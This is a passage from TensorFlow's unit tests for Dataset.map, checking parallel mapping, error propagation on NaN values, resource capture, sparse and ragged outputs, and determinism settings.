num_parallel_calls, buffer_size))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
@combinations.generate(_test_combinations())
def testImplicitDisposeParallelMapDataset(self, apply_map):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._parallel_map_dataset_factory(components, apply_map, 1000,
100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapUnspecifiedOutputSize(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testPrefetchError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset, lambda x: array_ops.check_numerics(x, "message")).prefetch(2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureIterator(self, apply_map):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return apply_map(dataset_ops.Dataset.range(10), _map_fn)
def _build_graph():
if context.executing_eagerly():
captured_iterator = iter(dataset_ops.Dataset.range(10))
else:
captured_iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10))
ds = _build_ds(captured_iterator)
return captured_iterator, ds
captured_iter, ds = _build_graph()
if not context.executing_eagerly():
self.evaluate(captured_iter.initializer)
get_next = self.getNext(ds, requires_initialization=True)
for i in range(10):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureHashTable(self, apply_map):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
dataset = apply_map(input_sentences,
lambda x: string_ops.string_split([x]).values)
dataset = apply_map(dataset, table.lookup)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(table.initializer)
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureQueue(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: queue.dequeue())
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(enqueue_op)
self.evaluate(close_op)
for element in elements:
self.assertEqual(element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureSameResourceMultipleTimes(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: (queue.dequeue(), queue_2.dequeue()))
self.evaluate(enqueue_op)
self.evaluate(close_op)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(100):
self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testSeededStatefulOperatorIsProperlyStateful(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).batch(2)
get_next = self.getNext(dataset, requires_initialization=True)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(self.evaluate(get_next()))
self.assertLen(random_values, 10)
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
get_next = self.getNext(dataset, requires_initialization=True)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(self.evaluate(get_next()))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
@combinations.generate(_test_combinations())
def testStatefulMapKeepsStateAcrossIterators(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).repeat(1000).batch(10)
get_next = self.getNext(dataset)
random_values = self.evaluate(get_next())
# Assert that one of the next 99 batches yielded by the iterator is
# different from the first.
i = 0
while i < 99:
if np.any(random_values != self.evaluate(get_next())):
break
i += 1
self.assertLess(i, 99)
@combinations.generate(_test_combinations())
def testStatefulOperationInShortCircuit(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
def increment_fn(x):
counter_var.assign_add(1)
return x
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, increment_fn)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations())
def testMapDict(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: {"foo": x * 2, "bar": x**2})
dataset = apply_map(dataset, lambda d: d["foo"] + d["bar"])
self.assertDatasetProduces(
dataset, expected_output=[i * 2 + i**2 for i in range(10)])
@combinations.generate(_test_combinations())
def testMapNamedtuple(self, apply_map):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(10)
images = apply_map(labels, lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = collections.namedtuple("Example", ["label", "image"])
dataset_namedtuple = apply_map(dataset_tuple, example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = apply_map(dataset_tuple, preprocess_tuple)
dataset_namedtuple = apply_map(dataset_namedtuple, preprocess_namedtuple)
next_tuple = self.getNext(dataset_tuple)
next_namedtuple = self.getNext(dataset_namedtuple)
# make sure both datasets contain the same data
for i in range(10):
tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(next_namedtuple())
@combinations.generate(_test_combinations())
def testMapAttrs(self, apply_map):
if attr is None:
self.skipTest("attr module is not available.")
# construct dataset of tuples
labels = dataset_ops.Dataset.range(10)
images = apply_map(labels, lambda l: -l)
dataset = dataset_ops.Dataset.zip((labels, images))
@attr.s(cmp=True)
class Example(object):
label = attr.ib()
image = attr.ib()
dataset = apply_map(dataset, Example)
def preprocess(example):
example.image = 2 * example.image
return example
dataset = apply_map(dataset, preprocess)
get_next = self.getNext(dataset)
for i in range(10):
data = self.evaluate(get_next())
self.assertEqual(data, Example(i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testUseStepContainerInMap(self, apply_map):
row = np.arange(6)
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(dataset,
lambda elems: map_fn.map_fn(lambda x: x * x, elems))
self.assertDatasetProduces(dataset, expected_output=[row**2])
@combinations.generate(_test_combinations())
def testCaseAndCondInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensor_slices(row)
return apply_map(dataset, lambda x: control_map_fn(x, num))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
for i in range(6):
self.assertEqual(
(i // 2 if i % 2 else i * 2) if (num == 2 or num == 3) else i * 2,
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), divide),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensors(row)
return apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
self.assertAllEqual(
[x // 2 if (num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseAndCondInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
row = np.arange(6)
num = 2
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
get_next = self.getNext(dataset)
self.assertAllEqual([(x // 2 if x % 2 else x * 2) if
(num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testNestedListMapDataset(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([0, 1, 2]).repeat(10)
dataset = apply_map(dataset, lambda a: ([a[1], a[0] + a[2]], a[1]))
expected_output = [(np.array([1, 2]), 1)] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(buffer_size=[1, 2, 3, 4])))
def testPrefetch(self, apply_map, buffer_size):
# We will use this event to test that `_map_py_func()` has been invoked a
# certain number of times (6 times, to be exact) after consuming fewer
# elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
# We can indirectly observe that varying the buffer size has the intended
# effect by observing when `ev` is set (on the 6th invocation of
# `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least one element
# to start the prefetching.
dataset = dataset_ops.Dataset.range(100)
dataset = apply_map(dataset, _map_fn).prefetch(buffer_size)
get_next = self.getNext(dataset)
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, self.evaluate(get_next()))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testReturnList(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testMultiOutputPyFunc(self, apply_map):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _map_fn)
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparse(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparseChain(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInference(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=True)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual((32, 3), dataset.element_spec.shape)
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInferencePartial(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=False)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual([None, 3], dataset.element_spec.shape.as_list())
@combinations.generate(_test_combinations())
def testTensorArray(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
self.assertDatasetProduces(
dataset, expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testTensorArrayChain(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
def _check(x):
self.assertIsInstance(x, tensor_array_ops.TensorArray)
return x.identity()
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testRagged(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(5)
dataset = apply_map(dataset, _ragged)
self.assertDatasetProduces(
dataset,
expected_output=[ragged_factory_ops.constant([[i]]) for i in range(5)])
@combinations.generate(_test_combinations())
def testRaggedChain(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
def _concat(i):
self.assertTrue(ragged_tensor.is_ragged(i))
return ragged_concat_ops.concat([i, i], 0)
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _ragged)
dataset = apply_map(dataset, _concat)
self.assertDatasetProduces(
dataset,
expected_output=[
self.evaluate(_concat(ragged_factory_ops.constant([[i]])))
for i in range(10)
])
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testParallelMapOutOfRangeError(self, apply_map):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
dataset = dataset_ops.Dataset.range(105)
dataset = apply_map(
dataset,
lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for i in range(100):
self.assertEqual(i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testConstantOutput(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, "hello", 10])
self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
@combinations.generate(test_base.graph_only_combinations())
def testWarnOnSeedFromOuterGraph(self):
with ops.Graph().as_default() as g:
g.seed = 10
warnings.simplefilter("always")
def _check_warning(caught_warnings, expected_result):
found_warning = False
for warning in caught_warnings:
if ("Explicitly set the seed in the function if this is not the "
"intended behavior" in str(warning)):
found_warning = True
break
self.assertEqual(found_warning, expected_result)
# map_fun doesn't use seed, so no warning is generated.
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(math_ops.square)
_check_warning(w, False)
def random_func(x):
x = math_ops.add(x, 1)
random_ops.random_shuffle([x, math_ops.square(x)])
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(random_func)
_check_warning(w, True)
def random_func_seeded(x):
ops.get_default_graph().seed = None
random_ops.random_shuffle(x)
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(random_func_seeded)
_check_warning(w, False)
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(
lambda x: random_ops.random_shuffle(x, seed=37))
_check_warning(w, False)
@combinations.generate(_test_combinations())
def testNestedDatasetMap(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
dataset = apply_map(dataset, dataset_ops.Dataset.from_tensor_slices)
dataset = apply_map(dataset, lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
@combinations.generate(_test_combinations())
def testReturnValueError(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegex(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\)"):
_ = apply_map(dataset, lambda x: Foo)
@combinations.generate(test_base.default_test_combinations())
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
self.assertDatasetProduces(
dataset, expected_error=(errors.InvalidArgumentError, "Type mismatch"))
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testNoInterOpParallelism(self, apply_map, num_parallel_calls):
dataset = dataset_ops.Dataset.from_tensors(0)
def _get_tid():
return np.int64(threading.current_thread().ident)
def _map_fn(_):
tids = []
for _ in range(10):
tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
return tids
dataset = apply_map(dataset, _map_fn)
dataset._variant_tensor.op._set_attr("use_inter_op_parallelism",
attr_value_pb2.AttrValue(b=False))
get_next = self.getNext(dataset)
tids = self.evaluate(get_next())
self.assertTrue(all(tids[0] == tid for tid in tids))
@combinations.generate(
combinations.times(_test_combinations(), _short_circuit_test_cases(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuit(self, apply_map, structure, fn, num_parallel_calls):
dataset = self.structuredDataset(structure).repeat()
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
if isinstance(structure, tuple):
expected = fn(*self.evaluate(self.structuredElement(structure)))
else:
expected = fn(self.evaluate(self.structuredElement(structure)))
self.assertEqual(expected, self.evaluate(get_next()))
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuitCapturedInput(self, apply_map, num_parallel_calls):
captured_t = variables.Variable(42)
dataset = self.structuredDataset(None).repeat()
dataset = apply_map(
dataset, lambda x: captured_t, num_parallel_calls=num_parallel_calls)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
self.assertEqual(42, self.evaluate(get_next()))
@combinations.generate(
combinations.combine(
tf_api_version=2,
mode=["eager", "graph"],
num_parallel_calls=[None, 12]))
def testPreserveCardinality(self, num_parallel_calls):
def py_fn(_):
raise StopIteration()
dataset = dataset_ops.Dataset.from_tensors(0).map(
lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
@combinations.generate(_test_combinations_with_mode("graph"))
def testCollectionCopy(self, apply_map):
w = variable_scope.get_variable("w", [])
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
def func(x):
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
return x
dataset = dataset_ops.Dataset.from_tensors(constant_op.constant(1.0))
_ = apply_map(dataset, func)
@combinations.generate(
combinations.times(
_test_combinations_with_mode_v1("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testMapCancellation(self, apply_map, num_parallel_calls):
# Checks that a cancellation of is threaded through to map transformation.
queue = data_flow_ops.FIFOQueue(10, dtypes.int32, ())
def fn(_):
return queue.dequeue()
dataset = dataset_ops.Dataset.range(1)
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset, requires_initialization=True)
with self.cached_session() as sess:
thread = self.checkedThread(self.assert_op_cancelled, args=(get_next(),))
thread.start()
time.sleep(0.2)
sess.close()
thread.join()
# TODO(b/126553094): map doesnt work with variable defined inside function in
# eager mode, possible Graph tensors leak out of the function building context
# from function graph in eager mode as variables are created in init_scope.
@combinations.generate(test_base.graph_only_combinations())
def testCreateVariableInsideFunctionWithGetter(self):
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return counter_var.assign_add(1)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
if hasattr(dataset, "map_with_legacy_function"):
# NOTE: In the legacy function, resource is captured by value.
with self.assertRaisesWithPredicateMatch(
AttributeError, "'Tensor' object has no attribute 'assign_add'"):
dataset.map_with_legacy_function(func)
dataset = dataset.map(func)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(10):
self.assertEqual(i + 1, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureVariable(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i + 1, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureUninitializedVariableError(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
with self.assertRaises(errors.NotFoundError):
self.evaluate(get_next())
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureConstantsWithConflictingDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
with ops.device("/device:CPU:0"):
a = constant_op.constant(3.0)
with ops.device("/device:CPU:1"):
b = constant_op.constant(5.0)
def func(_):
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
expected_output = [8.0] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testReferenceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.VariableV1(3.0)
with ops.device("/device:CPU:1"):
b = variables.VariableV1(5.0)
return math_ops.add(a, b)
# NOTE: Use the legacy function implementation as eager function will
# convert RefVariables to ResourceVariables.
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [8.0] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testResourceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
with ops.device("/device:CPU:0"):
a_var = variable_scope.get_variable(
"a", (), dtypes.int32, use_resource=True)
a_var = math_ops.add(a_var, 1)
with ops.device("/device:CPU:1"):
b_var = variable_scope.get_variable(
"b", (), dtypes.int32, use_resource=True)
return math_ops.add(a_var, b_var)
g = ops.Graph()
with self.session(config=config, graph=g):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [1] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(
local_determinism=[None, True, False],
global_determinism=[True, False])))
def testDeterminismConfiguration(self, apply_map, local_determinism,
global_determinism):
expect_determinism = local_determinism or (local_determinism is None and
global_determinism)
elements = list(range(1000))
def dataset_fn(delay_ms):
def sleep(x):
time.sleep(delay_ms / 1000)
return x
def map_function(x):
if math_ops.equal(x, 0):
return script_ops.py_func(sleep, [x], x.dtype)
else:
return x
dataset = dataset_ops.Dataset.from_tensor_slices(elements)
dataset = apply_map(
dataset,
map_function,
num_parallel_calls=2,
deterministic=local_determinism)
opts = options_lib.Options()
opts.deterministic = global_determinism
dataset = dataset.with_options(opts)
return dataset
self.checkDeterminism(
dataset_fn, expect_determinism, expected_elements=elements)
@combinations.generate(_test_combinations())
def testNoneComponent(self, apply_map):
